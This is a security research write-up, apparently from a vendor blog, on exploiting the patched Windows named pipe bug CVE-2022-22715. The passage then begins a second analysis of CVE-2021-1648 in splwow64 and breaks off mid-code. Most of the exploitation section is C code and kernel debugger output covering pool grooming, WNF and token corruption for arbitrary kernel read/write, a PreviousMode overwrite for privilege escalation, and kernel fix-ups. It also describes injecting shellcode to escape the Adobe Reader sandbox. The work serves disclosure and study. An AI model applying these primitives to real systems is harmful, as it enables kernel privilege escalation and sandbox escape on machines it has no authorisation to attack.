0: kd> !pool ffffb0880d6a2000 // ======> new VS subsegment header
Pool page ffffb0880d6a2000 region is Paged pool
*ffffb0880d6a2000 size: 30 previous size: 0 (Free) *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a2040 size: 880 previous size: 0 (Allocated) Toke
 ffffb0880d6a28d0 size: 580 previous size: 0 (Allocated) Wnf Process: ffffc10b74a1c080
 ffffb0880d6a2e50 size: 190 previous size: 0 (Free) ..D.
As the layout shows, there are many free LFH pool holes at the end of the LFH bucket, and the new VS subsegment is next to the LFH bucket. If we create the vulnerable object now, it will land in one of the free LFH pool holes.
Note that the vulnerable object may not be located in the last LFH page, but that isn't necessary: the out-of-bounds write may corrupt the LFH bucket, which does not affect our exploitation.
0: kd> r
rax=ffffb0880d69e750 rbx=0000000000000002 rcx=0000000000000028
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffe4835a302301
rip=fffff800401c2b31 rsp=ffffe4835a301e00 rbp=ffffe4835a301f00
 r8=0000000000000fff  r9=00000000000004ca r10=000000006e46704e
r11=0000000000001001 r12=ffffe4835a302220 r13=ffffe4835a302310
r14=0000000000000001 r15=000000000000ff01
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040282
Npfs!NpTranslateContainerLocalAlias+0x391:
fffff800`401c2b31 4889442450 mov qword ptr [rsp+50h],rax ss:0018:ffffe483`5a301e50=0000000000000000
0: kd> !pool @rax // ===> the vulnerable pool is located in one of the free holes in the LFH bucket
Pool page ffffb0880d69e750 region is Paged pool
 ffffb0880d69e700 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e720 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
*ffffb0880d69e740 size: 20 previous size: 0 (Allocated) *NpFn
        Pooltag NpFn : Name block, Binary : npfs.sys
 ffffb0880d69e760 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e780 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7a0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7c0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7e0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e800 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e820 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e840 size: 20 previous size: 0 (Free) MPCt
 ffffb0880d69e860 size: 20 previous size: 0 (Free) MPCt
 ffffb0880d69e880 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e8a0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e8c0 size: 20 previous size: 0 (Free) MPCt
 ffffb0880d69e8e0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
After RtlUnicodeStringPrintf is invoked, it writes about 0xfffe bytes out of bounds, corrupting both the LFH pool space and the VS pool space. The data written is the named pipe name, which we control, so we need to craft the payload so that it modifies _WNF_STATE_DATA->DataSize.
When we create a _WNF_STATE_DATA, we can't set DataSize larger than the _WNF_STATE_DATA data region, but after triggering the vulnerability we can modify it to any value. The maximum value of DataSize is 0x1000, which gives us a limited out-of-bounds r/w primitive to modify the _TOKEN object in the next page.
0: kd> dq ffffb0880d6a28d0 l4
ffffb088`0d6a28d0 00001000`00001000 00001000`00001000
ffffb088`0d6a28e0 00001000`00001000 00001000`00001000
Stage 3: Gain arbitrary address r/w
In stage 2, we did the pool feng shui and gained a limited r/w primitive with the _WNF_STATE_DATA object, but there is a big problem: how do I find which object handle I need to use?
If I corrupt an object and then use it through its handle, the corrupted object header will crash the system. So I need to find a usable manager object (_WNF_STATE_DATA) name and worker object (_TOKEN) handle.
I thought of a solution. For the manager object, when we read from the _WNF_STATE_DATA data region, we call NtQueryWnfStateData with a specified length; if the length is larger than DataSize, it returns the NT error code 0xc0000023. For the worker object, every _TOKEN object has a unique LUID named TokenId, which can be queried through NtQueryInformationToken with the TokenStatistics TokenInformationClass. We query it for each _TOKEN object we spray and store the values in an array.
Because _WNF_NAME_INSTANCES is not corrupted, we can use NtUpdateWnfStateData and NtQueryWnfStateData normally.
I have already corrupted some _WNF_STATE_DATA objects in stage 2 and set their DataSize to 0x1000, so we can call NtQueryWnfStateData with a length of 0x1000 to find the corrupted _WNF_STATE_DATA objects, and read out-of-bounds data to find the last corrupted page, the one adjacent to the first normal page.
Reading out-of-bounds data does not corrupt the object structure, so we can safely call NtQueryWnfStateData with a length of 0x1000: if the _WNF_STATE_DATA object isn't corrupted, the call returns 0xC0000023, and if it is, the call returns the out-of-bounds data.
If the out-of-bounds data is my malicious data, I know that this _WNF_STATE_DATA is not in the last corrupted page. I use this to find the last corrupted page, from which I can read the next normal page containing the _TOKEN object structure. The _WNF_STATE_DATA object in the last corrupted page is our manager object.
The _TOKEN object has a LUID field; we take it from the out-of-bounds read data and match it against the array we built before, which finally gives us the worker object.
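The matching step is a plain lookup. Here is a minimal sketch, assuming the TokenId of every sprayed token was recorded next to its handle at spray time; `sprayed_token`, `luid_at` and `find_worker` are hypothetical names, and the offset of TokenId inside the leaked page is left as a parameter because it depends on the pool layout and the Windows build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same shape as the Windows LUID structure. */
typedef struct {
    uint32_t low_part;
    int32_t  high_part;
} luid_t;

/* One entry per sprayed token: its handle and the TokenId recorded for it. */
typedef struct {
    uintptr_t handle;
    luid_t    token_id;
} sprayed_token;

/* Pull a LUID out of the out-of-bounds read data at a caller-chosen offset. */
static luid_t luid_at(const uint8_t *leak, size_t leak_size, size_t offset)
{
    luid_t id;

    assert(offset + sizeof id <= leak_size);
    memcpy(&id, leak + offset, sizeof id);
    return id;
}

/* Return the index of the sprayed token with this TokenId, or -1 if none. */
static long find_worker(const sprayed_token *tokens, size_t count, luid_t leaked)
{
    size_t i;

    for (i = 0; i < count; i++) {
        if (tokens[i].token_id.low_part == leaked.low_part &&
            tokens[i].token_id.high_part == leaked.high_part)
            return (long)i;
    }
    return -1;
}
```

The handle stored at the returned index is the worker object handle; a result of -1 would mean the token adjacent to the manager object is not one of the sprayed ones.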
0: kd> dq 0xffffb0880d6ae000 // ===> the last corrupted page
ffffb088`0d6ae000 00010001`00010001 00010001`00010001
ffffb088`0d6ae010 00010001`00010001 00010001`00010001
ffffb088`0d6ae020 00010001`00010001 00010001`00010001
ffffb088`0d6ae030 00010001`00010001 00010001`00010001
0: kd> dq 0xffffb0880d6af000 // ===> the first normal page
ffffb088`0d6af000 656b6f54`03880000 00000000`00000000
ffffb088`0d6af010 000007b8`00001000 00000000`00000108
ffffb088`0d6af020 ffffc10b`775e8b80 00000000`00000000
ffffb088`0d6af030 00000000`00008000 00000000`00000001
ffffb088`0d6af040 00000000`00000000 00000000`0008006d
So far, I have the manager object name and the worker object handle. Next I construct 0x1000 bytes of fake data containing a fake _TOKEN object structure and a _WNF_STATE_DATA structure. I already obtained the content of the normal _TOKEN object structure by invoking NtQueryWnfStateData earlier, so I only need to change a few values to gain an arbitrary r/w primitive.
Read Primitive:
FakeSepCached = malloc(0x48);
ZeroMemory(FakeSepCached, 0x48);
*(USHORT*)((ULONG_PTR)FakeSepCached + 0x2A) = 0x8;
*(UINT64*)((ULONG_PTR)FakeSepCached + 0x30) = ReadAddress;
CorruptionData = malloc(OriginalSize);
ZeroMemory(CorruptionData, OriginalSize);
CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize);
*(PUINT64)((UINT64)CorruptionData + TokenOffset + 0x480) = (UINT64)FakeSepCached;
*(PUINT64)((UINT64)CorruptionData + TokenOffset - 0x30) = (UINT64)3;
Status = fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL); // ===> control manager object
if (Status < 0) {
    free(CorruptionData);
    free(FakeSepCached);
    return FALSE;
}
// ===> arbitrary read
Status = fNtQueryInformationToken(
    TokenHandle,
    TokenBnoIsolation,
    &RecvBuffer,
    RecvBufferSize,
    &RecvBufferSize);
Write Primitive:
CorruptionData = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OriginalSize);
CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize);
*(PUINT64)(CorruptionData + TokenOffset - 0x30) = 2;
*(PUINT64)(CorruptionData + TokenOffset + 0x8c) = 0x10000;
*(PUINT64)(CorruptionData + TokenOffset + 0xa8) = (UINT64)pETHREAD + 0x1f0;
*(PUINT64)(CorruptionData + TokenOffset + 0xb0) = (UINT64)pETHREAD + 0x1e8;
*(PUINT64)(CorruptionData + TokenOffset + 0xb8) = (UINT64)0;
fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL); // ===> control manager object
pACL = (PACL)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x48);
pACL->AclRevision = 2;
pACL->AceCount = 1;
pACL->AclSize = 0x48;
pACE = (PACE_HEADER)(pACL + 1);
pACE->AceSize = 0x48 - sizeof(ACL);
pACE->AceType = 50;
*(PUINT64)((ULONG_PTR)pACL + 0x18) = (UINT64)pQueueListEntryFlink;
*(PUINT64)((ULONG_PTR)pACL + 0x20) = (UINT64)pQueueListEntryBlink;
*(PUINT64)((ULONG_PTR)pACL + 0x28) = (UINT64)pNextProcessor;
*(PUINT64)((ULONG_PTR)pACL + 0x30) = (UINT64)pProcess;
*(PUINT64)((ULONG_PTR)pACL + 0x38) = 0x3;
*(PUINT64)((ULONG_PTR)pACL + 0x40) = 0x0100000008000000;
// ===> arbitrary write
Status = fNtSetInformationToken(
    TokenHandle,
    TokenDefaultDacl,
    &pACL,
    8);
Stage 4: Elevation of privilege and Fix up
We now have an arbitrary address r/w primitive. At first, I just wanted to replace the process token with the SYSTEM token. It succeeded, but after a while I found that it crashes easily. For example, since I corrupted some _TOKEN objects, opening Process Explorer, which traverses the user-space handle table of every process, causes a crash when it accesses the handle table of the exploit process.
I need to fix things up after the exploit, so I decided not to replace the process token and to modify _ETHREAD->PreviousMode instead. If I set PreviousMode to 0 and then invoke NT APIs such as NtReadVirtualMemory and NtWriteVirtualMemory, the kernel treats the thread as running in kernel mode. This is a common privilege escalation technique, and it is more convenient for both elevation and fix-up than constructing a fake object every time.
Finally, I use the worker object to set _ETHREAD->PreviousMode to 0, then use NtReadVirtualMemory/NtWriteVirtualMemory to elevate privileges and fix up.
There are a few things we need to fix.
1. Corrupted _TOKEN object.
I triggered the corrupted-object crash and realized that it happens because I corrupted the object type field in the object header, so the system crashes when nt references the object. I can read the cookie from the nt data section and calculate the type index stored in the object header, so I fix the header of every corrupted _TOKEN object.
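The stored type byte is an XOR of three values: the real type index, the one-byte header cookie, and the second-lowest byte of the object header address. Because the address byte takes part, the value has to be recomputed for every header that gets repaired. A minimal sketch of that arithmetic follows; the function names are hypothetical, and the cookie and type index used in the usage note are made-up example values.

```c
#include <assert.h>
#include <stdint.h>

/* Second-lowest byte of the object header address. */
static uint8_t addr_byte(uint64_t header_addr)
{
    return (uint8_t)(header_addr >> 8);
}

/* Value stored in the object header for a given real type index. */
static uint8_t encode_type_index(uint8_t real_index, uint8_t cookie,
                                 uint64_t header_addr)
{
    return (uint8_t)(real_index ^ cookie ^ addr_byte(header_addr));
}

/* XOR is its own inverse, so decoding applies the same operation. */
static uint8_t decode_type_index(uint8_t stored, uint8_t cookie,
                                 uint64_t header_addr)
{
    return (uint8_t)(stored ^ cookie ^ addr_byte(header_addr));
}

/* Derive the byte for another header from one known-good stored byte. */
static uint8_t reencode_for_address(uint8_t stored, uint8_t cookie,
                                    uint64_t old_addr, uint64_t new_addr)
{
    uint8_t real = decode_type_index(stored, cookie, old_addr);
    uint8_t out = encode_type_index(real, cookie, new_addr);

    assert(decode_type_index(out, cookie, new_addr) == real);
    return out;
}
```

With an example cookie of 0x5a and an example type index of 5, a header at 0xffffb0880d6af040 stores 0xaf, while the header one page lower at 0xffffb0880d6ae040 stores 0xbf. This is why a fix-up loop cannot write the same byte into every corrupted header.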
UINT64 pObjHeaderCookie = ntaddr + OBJHEADERCOOKIE;
BYTE cookie;
X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pObjHeaderCookie, (UINT64)&cookie, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
BYTE addrbyte = (pPoolAddress >> 8) & 0xff;
BYTE offset = cookie ^ addrbyte ^ TokenTypeIndex;
BYTE bModifiedType;
for (UINT i = typeindex; i <= modifiedindex; i++) {
    bModifiedType = offset ^ cookie ^ (((pPoolAddress - i * 0x1000) >> 8) & 0xff);
    X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x88), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
    X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x48), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
}
2. Corrupted VS pool structure.
This was the most complicated problem I met. I corrupt not only the object structure but also the VS pool structure, which causes unexpected BSoDs. After reversing the VS allocator in depth, I found that an RB tree manages the VS pool; if I know a VS pool address, I can calculate the address of the VS pool manager.
When a VS pool chunk is allocated or freed, the allocator traverses the RB tree from the VS pool manager. If I have corrupted a VS pool node, the system crashes when the traversal starts from the root node and reaches the corrupted node.
So I need to find the crashing node, starting from the root of the RB tree, and delete it from the tree. This may leak some memory if other VS pool nodes sit under the corrupted node, but that is better than crashing the system.
I calculate the root VS pool node, traverse the RB tree, and delete the node from the tree.
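The idea of "walk down from the root and cut the bad node out" can be sketched in user mode as follows. This is a simplified stand-in, not the kernel layout: the `struct node` type, the `key` field (standing in for the node address) and `detach_node` are all hypothetical, and the sketch simply unlinks the subtree instead of writing a fake node as my exploit does.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical user-mode stand-in for a tree node; real VS pool nodes differ. */
struct node {
    struct node *left;
    struct node *right;
    uint64_t key;          /* stands in for the node's address */
};

/*
 * Walk from the root toward `target` and detach the first node whose key
 * matches after masking. Returns the detached node, or NULL if not found.
 * Everything below the detached node becomes unreachable (the "leak").
 */
static struct node *detach_node(struct node **root, uint64_t target,
                                uint64_t mask)
{
    struct node **link = root;   /* points at the parent's child slot */
    while (*link != NULL) {
        struct node *cur = *link;
        if ((cur->key & mask) == (target & mask)) {
            *link = NULL;        /* unlink the subtree from its parent */
            return cur;
        }
        link = (target < cur->key) ? &cur->left : &cur->right;
    }
    return NULL;
}
```

Note the parentheses around the masked comparison: in C, `==` binds tighter than `&`, so `a == b & mask` would compare first and mask afterwards.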
UINT64 zeroSet = 0x0; UINT64 ntaddr = KernelSymbolInfo(); UINT64 pGlobalHeapAddr = ntaddr + GLOBALOFFSET; UINT64 pGlobalHeapValue; UINT64 pPoolChunkAddr = pPoolAddress & 0xfffffffffff00000; UINT64 pPoolChunkValue; X64Call(pReadVirtualMemory, 5 , (UINT64)GetCurrentProcess(), (UINT64)pGlobalHeapAddr, (UINT64)&pGlobalHeapValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pPoolChunkAddr + 0x10, (UINT64)&pPoolChunkValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte); UINT64 pHpMgrAddr = ((UINT64)pGlobalHeapValue ^ (UINT64)pPoolChunkAddr ^ (UINT64)pPoolChunkValue ^ 0xA2E64EADA2E64EAD) - 0x100 + 0x290; // ======> calculate the VS pool manager address UINT64 pRootChunkAddr; UINT64 pRightChunk; UINT64 pLeftChunk; X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pHpMgrAddr, (UINT64)&pRootChunkAddr, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); // ====> get the root VS pool address UINT64 pTargetChunk = pPoolAddress & 0xffffffffffff0000; UINT64 pFinalChunk = NULL; UINT64 pTempLeftChunk = pLeftChunk, pTempRightChunk = pRightChunk; UINT64 pTempRootChunk; pRootChunkAddr = pLeftChunk; // ====> traversal from left chunk while (pLeftChunk != 0 && pRightChunk != 0) { X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); if (pTargetChunk == pRootChunkAddr & 0xffffffffffff0000) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, 
(UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); break; } pTempRootChunk = pRootChunkAddr; if (pLeftChunk > pRootChunkAddr) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pRightChunk; continue; } else if (pRootChunkAddr > pRightChunk) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk < pRootChunkAddr) { pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk > pRootChunkAddr) { pRootChunkAddr = pRightChunk; continue; } } pRootChunkAddr = pTempRightChunk; // ====> traversal from right chunk while (pLeftChunk != 0 && pRightChunk != 0) { X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); if (pTargetChunk == pRootChunkAddr & 0xffffffffffff0000) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); break; } pTempRootChunk = pRootChunkAddr; if (pLeftChunk > pRootChunkAddr) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pRightChunk; continue; } else if (pRootChunkAddr > pRightChunk) { 
X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk < pRootChunkAddr) { pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk > pRootChunkAddr) { pRootChunkAddr = pRightChunk; continue; } }
After all the fixes, it's time to pop cmd. Because the Adobe Reader render process runs in a Job, I can't create a process from it, so I inject shellcode into the browser process and write a file on volume C: to complete the exploit.
Patch
Microsoft patched the vulnerability in February 2022. npfs now uses an int to calculate the total size and checks that the total still fits in a USHORT (the code compares it against 0xFFFE) before using it.
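The difference between the two patterns can be shown with a small, self-contained sketch. The function names and the example lengths are hypothetical; only the 0xFFFE bound comes from the patched code.

```c
#include <stdint.h>
#include <stdbool.h>

/* Unsafe pattern: the sum is truncated to 16 bits before anyone checks it. */
static uint16_t truncated_total(uint16_t name_len, uint16_t extra)
{
    return (uint16_t)(name_len + extra);
}

/* Patched pattern: add in a wider type, then reject totals that do not fit. */
static bool checked_total(uint16_t name_len, uint16_t extra, uint16_t *out)
{
    uint32_t total = (uint32_t)name_len + (uint32_t)extra;
    if (total > 0xFFFE)
        return false;            /* would not fit in a USHORT length field */
    *out = (uint16_t)total;
    return true;
}
```

With a length of 0xFFF0 and an extra 0x78 bytes, the truncated version yields 0x68, a far smaller allocation than the data that is later copied, while the checked version rejects the request.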
NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *a1, void *a2, _DWORD *a3) { [...] if ( v13 ) { if ( TokenInformation ) { v20 = DestinationString.Length + v37.Length; v21 = v20 + 120; v22 = v20 + 122; } else { v21 = v37.Length + 96; v22 = v37.Length + 98; } } else { v21 = DestinationString.Length + 112; v22 = DestinationString.Length + 114; } if ( !v18 ) v22 = v21; v23 = v19 + v22; if ( v23 <= 0xFFFE ) { v28.MaximumLength = v23; Pool2 = (WCHAR *)ExAllocatePool2(256i64, (unsigned __int16)v23, 1850110030i64); [...] } Demonstrate how I use WNF API with a accessible SD BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) { NTSTATUS Status; HANDLE gProcessToken; WNF_TYPE_ID TypeID = { 0 }; PSECURITY_DESCRIPTOR SecurityDescriptor; ULONG RetLength = 0; BOOL DaclPresent, SaclPresent; BOOL DaclDefault, SaclDefault, OwnerDefault, GroupDefault; PACL pDacl, pSacl; PSID pOwner, pGroup; ACE_HEADER* AceHeader; ACCESS_ALLOWED_ACE* pACE; PSECURITY_DESCRIPTOR GetSD; Status = fNtOpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &gProcessToken); if (Status < 0) { return FALSE; } SecurityDescriptor = (PSECURITY_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); // initialize a new SD GetSD = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); Status = fNtQuerySecurityObject( gProcessToken, OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION, GetSD, 0x1000, &RetLength); // Query a accessible SD from process token if (Status < 0) { return FALSE; } // Get Owner/Group/DACL/SACL from accessible security object GetSecurityDescriptorOwner(GetSD, &pOwner, &OwnerDefault); GetSecurityDescriptorGroup(GetSD, &pGroup, &GroupDefault); GetSecurityDescriptorDacl(GetSD, &DaclPresent, &pDacl, &DaclDefault); GetSecurityDescriptorSacl(GetSD, &SaclPresent, &pSacl, &SaclDefault); AceHeader = (ACE_HEADER*)&pDacl[1]; while ((DWORD)AceHeader < (DWORD)pDacl + (DWORD)pDacl->AclSize) 
{ if (AceHeader->AceType == ACCESS_ALLOWED_ACE_TYPE) { pACE = (ACCESS_ALLOWED_ACE*)&AceHeader[0]; pACE->Mask = GENERIC_ALL; } AceHeader = (ACE_HEADER*)((DWORD)AceHeader + (DWORD)AceHeader->AceSize); } // Set it to new SD InitializeSecurityDescriptor(SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION); SetSecurityDescriptorOwner(SecurityDescriptor, pOwner, OwnerDefault); SetSecurityDescriptorGroup(SecurityDescriptor, pGroup, GroupDefault); SetSecurityDescriptorDacl(SecurityDescriptor, DaclPresent, pDacl, DaclDefault); SetSecurityDescriptorSacl(SecurityDescriptor, SaclPresent, pSacl, SaclDefault); HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, GetSD); Status = fNtCreateWnfStateName( pStateName, WnfTemporaryStateName, WnfDataScopeSession, FALSE, &TypeID, 0x1000, SecurityDescriptor); // invoke WNF API with new SD if (Status < 0) { return FALSE; } PVOID lpBuff = (PVOID)malloc(dwWantedSize - 0x20); memset(lpBuff, 0x00, dwWantedSize - 0x20); Status = fNtUpdateWnfStateData( pStateName, lpBuff, dwWantedSize - 0x20, &TypeID, NULL, 0, 0); if (Status < 0) { return FALSE; } free(lpBuff); return TRUE; } ReferenceSecurity Update Guide - Microsoft Security Response Center
Timeline
2021-10-17 Reported vulnerability to Microsoft via TianfuCup 2021
2022-02-08 Microsoft released patch, assigned CVE-2022-22715
2022-08-23 Blog post published in partnership with the Adobe Product Security Incident Response Team
The Story Of CVE-2021-1648
Author: k0shl of 360 Vulcan Team
Summary
In the January 2021 Patch Tuesday, MSRC patched a vulnerability in the splwow64 service, assigned CVE-2021-1648 (also known as CVE-2020-17008). It merged two interesting cases of mine that bypass the patch for CVE-2020-0986; one of them was also found by Google Project Zero (https://bugs.chromium.org/p/project-zero/issues/detail?id=2096). In total it covers one EoP case and two information-leak cases.
This vulnerability was planned to be patched in October 2020, but MSRC seems to have found other serious security problems in the service, so they postponed the patch for four months.
Background
In this blog I don't want to say much about the mechanism of splwow64; there are already many analyses of CVE-2020-0986, so let's focus on the vulnerability.
After CVE-2020-0986 was patched, I did a quick bindiff on splwow64 and gdi32full and found that two checks had been added.
One is that Microsoft added two printer handle (also known as cookie?) check functions named "FindDriverForCookie" and "FindPrinterHandle". They check the printer driver handle, which is stored in a global variable.
__int64 __fastcall FindDriverForCookie(__int64 a1)
{
  v3 = qword_1800EABA0;
  if ( qword_1800EABA0 )
  {
    do
    {
      if ( a1 == *(_QWORD *)(v3 + 56) ) //check driver index
        break;
      v3 = *(_QWORD *)(v3 + 8);
    }
    while ( v3 );
    if ( v3 )
      ++*(_DWORD *)(v3 + 44);
  }
  RtlLeaveCriticalSection(&semUMPD);
  return v3; // return driver heap
}
__int64 *__fastcall FindPrinterHandle(__int64 a1, int a2, int a3)
{
  for ( i = *(__int64 **)(v3 + 64); i && (*((_DWORD *)i + 2) != v5 || *((_DWORD *)i + 3) != v4); i = (__int64 *)*i ) //check printer handle
    ;
}
The other is that MSRC added two pointer check functions, "UMPDStringPointerFromOffset" and "UMPDPointerFromOffset", to check whether a pointer is valid.
FindDriverForCookie and FindPrinterHandle bypass
First, I don't know why Microsoft added FindDriverForCookie and FindPrinterHandle; maybe they are not meant as a mitigation? After a quick review, I found a command, 0x6A, that stores a printer handle with a value we control into the service's global variable, which bypasses both check functions.
__int64 __fastcall bAddPrinterHandle(__int64 a1, int a2, int a3, __int64 a4)
{
  v9 = RtlAllocateHeap(*(_QWORD *)(__readgsqword(0x60u) + 48), 0i64, 24i64);
  v10 = (_QWORD *)v9;
  if ( v9 )
  {
    *(_DWORD *)(v9 + 8) = v6;
    *(_DWORD *)(v9 + 12) = v5;
    *(_QWORD *)(v9 + 16) = v8;
    RtlEnterCriticalSection(&semUMPD);
    *v10 = *(_QWORD *)(v4 + 0x40);
    v7 = 1;
    *(_QWORD *)(v4 + 0x40) = v10; //add print handle which can be controlled by user
    RtlLeaveCriticalSection(&semUMPD);
  }
  return v7;
}
When command 0x6A is invoked, bAddPrinterHandle adds the print handle to the driver heap, which is stored in the global variable |qword_1800EABA0|.
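The add-then-find relationship between the two functions can be modeled with a plain singly linked list. This is only a sketch: the struct and function names are hypothetical, and the field layout is my reading of the decompiled offsets (+8, +12, +16), not a documented structure.

```c
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical node layout modeled on the decompiled offsets. */
struct printer_handle {
    struct printer_handle *next;   /* +0  */
    uint32_t id_low;               /* +8,  compared by the lookup */
    uint32_t id_high;              /* +12, compared by the lookup */
    uint64_t value;                /* +16 */
};

/* Push a caller-chosen handle onto the front of the list (like command 0x6A). */
static int add_handle(struct printer_handle **head, uint32_t lo, uint32_t hi,
                      uint64_t value)
{
    struct printer_handle *n = malloc(sizeof *n);
    if (n == NULL)
        return 0;
    n->id_low = lo;
    n->id_high = hi;
    n->value = value;
    n->next = *head;
    *head = n;
    return 1;
}

/* Walk the list until both halves match (like FindPrinterHandle). */
static struct printer_handle *find_handle(struct printer_handle *head,
                                          uint32_t lo, uint32_t hi)
{
    for (; head != NULL; head = head->next)
        if (head->id_low == lo && head->id_high == hi)
            return head;
    return NULL;
}
```

Since the caller picks both halves of the handle when adding it, a later lookup with the same pair always succeeds, which is why the check does not stop the request.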
//set print handle to 0xdeadbeef00006666
0:007> p
gdi32full!bAddPrinterHandle+0x54:
00007ff8`380fc3bc 44897808 mov dword ptr [rax+8],r15d ds:00000000`0108a428=00000000
0:007> p
gdi32full!bAddPrinterHandle+0x58:
00007ff8`380fc3c0 4489700c mov dword ptr [rax+0Ch],r14d ds:00000000`0108a42c=00000000
0:007> r r14d
r14d=deadbeef
0:007> r r15d
r15d=6666
//driver heap stored in global variable
0:007> dq gdi32full+0xEABA0 l1
00007ff8`381baba0 00000000`0108d000
0:007> dq 108d000+0x40 l1
00000000`0108d040 00000000`0108a420
0:007> dq 108a420+0x8 l1
00000000`0108a428 deadbeef`00006666
So we can easily bypass the printer handle check when invoking command 0x6D and reach the vulnerable code.
case 0x6Du:
  v31 = FindDriverForCookie(*(_QWORD *)(v6 + 24));
  v32 = v31;
